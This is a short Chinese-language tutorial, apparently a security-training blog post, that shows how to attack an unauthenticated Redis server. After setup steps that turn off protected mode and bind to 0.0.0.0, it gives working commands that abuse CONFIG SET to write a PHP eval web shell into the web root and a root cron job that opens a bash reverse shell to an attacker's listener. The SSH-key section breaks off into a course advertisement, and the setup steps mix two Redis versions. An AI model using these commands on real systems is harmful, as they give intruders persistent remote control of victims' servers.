redis安装及配置
wget http://download.redis.io/releases/redis-3.2.0.tar.gz tar xzf
redis-3.2.0.tar.gz cd redis-3.2.0 make cp
/root/redis-6.2.6/redis.conf /usr/local/redis/bin/ cd
/usr/local/redis/bin/ vi redis.conf
#修改内容如下:
#protected-mode 的值从 yes 修改成 no
#bind 127.0.0.1 改成bind 0.0.0.0 ./redis-server redis.conf
关闭防护模式
修改成 0.0.0.0 ,修改白名单为任意IP地址
redis在设有防护模式的场景下,无法输入有效命令
且flushall
为删除Redis数据库数据指令,在实战中切勿使用,牢底坐穿术!
攻击利用
redis基本命令
#连接redis
redis-cli -h 192.168.1.108查看redis版本信息、一些具体信息、服务器版本信息等等:
192.168.1.108:6379>info将变量x的值设为test:
192.168.1.108:6379>set x “hello”获取设置的某个变量的值:
192.168.1.108:6379>get x查看所有键:
192.168.1.108:6379>KEYS *获取默认的redis目录、和rdb文件名:可以在修改前先获取,然后走的时候再恢复。
192.168.1.108:6379>CONFIG GET dir
192.168.1.108:6379>CONFIG GET dbfilename
写入WebShell
set xx "\n\n\<?php @eval($\_POST['test']);?>\n\n"
config set dir /var/www/html
config set dbfilename shell.php
save
写入计划任务
先在自己的服务器上监听一个端口
nc -lvnp 7999
然后执行命令:
redis-cli -h 192.168.1.108
set xx "\n\* \* \* \* \* /bin/bash -i >& /dev/tcp/192.168.63.128/7999 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
## 写入 SSH公钥
在本地生成一对密钥:
### 给大家的福利
**零基础入门**
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

因篇幅有限,仅展示部分资料